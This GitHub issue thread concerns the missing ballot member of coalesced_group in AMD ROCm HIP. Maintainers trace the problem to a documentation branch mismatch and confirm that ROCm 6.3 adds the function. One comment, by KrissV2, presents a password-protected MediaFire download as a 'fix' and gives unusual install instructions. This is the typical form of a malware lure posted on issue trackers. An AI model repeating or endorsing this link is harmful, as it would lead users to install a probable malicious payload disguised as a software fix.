### ISSUE TITLE
[Issue]: coalesced_group member function ballot is missing

### ISSUE THREAD

**Issue by songrui2009** [amd/rocm-examples#157]
### Problem Description

according to the document:
https://rocm.docs.amd.com/projects/HIP/en/docs-6.1.2/doxygen/html/amd__hip__cooperative__groups_8h_source.html
or higher ROCM version
coalesced_group::ballot can be enable by defintion HIP_ENABLE_WARP_SYNC_BUILTINS
but this is invalid

### Operating System

ubuntu 22.04

### CPU

AMD Ryzen 5 3600 6-Core Processor

### GPU

AMD Radeon RX 7900 XTX, AMD Radeon RX 7900 XT

### ROCm Version

ROCm 6.1.0

### ROCm Component

HIP

### Steps to Reproduce

-DHIP_ENABLE_WARP_SYNC_BUILTINS
...
namespace cg = cooperative_groups;
...
    cg::coalesced_group thread_warp = cg::coalesced_threads(gg);
    uint warp_done = thread_warp.ballot(1);

compile error:
error: no member named 'ballot' in 'cooperative_groups::coalesced_group'

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Snektron** [comment]
Hi, sorry for the late response. This is not quite the right repo to make this issue in, I believe it should be best to make these kind of issues in https://github.com/ROCm/ROCm.

Regardless, I dug into it a bit for you, and it seems like the source thats reported on the ROCm docs page is not for the right branch. The ballot function isn't yet present in the header for ROCm 6.2.0 (see [here](https://github.com/ROCm/clr/blob/rocm-6.2.x/hipamd/include/hip/amd_detail/amd_hip_cooperative_groups.h)), but it is present in the amd-staging version (see [here](https://github.com/ROCm/clr/blob/amd-staging/hipamd/include/hip/amd_detail/amd_hip_cooperative_groups.h#L477)). This usually means that it will be added in the next ROCm version.

I'll see if I can get that ROCm docs page fixed, there is probably something wrong there.

**Comment by taylding-amd** [comment]
Hi @songrui2009, I have verified that the ballot function is present in the latest ROCm release (6.3). I will close the issue, as the bug no longer exists in this version. If you have any further questions or need additional assistance, please feel free to reopen the issue. Thank you!
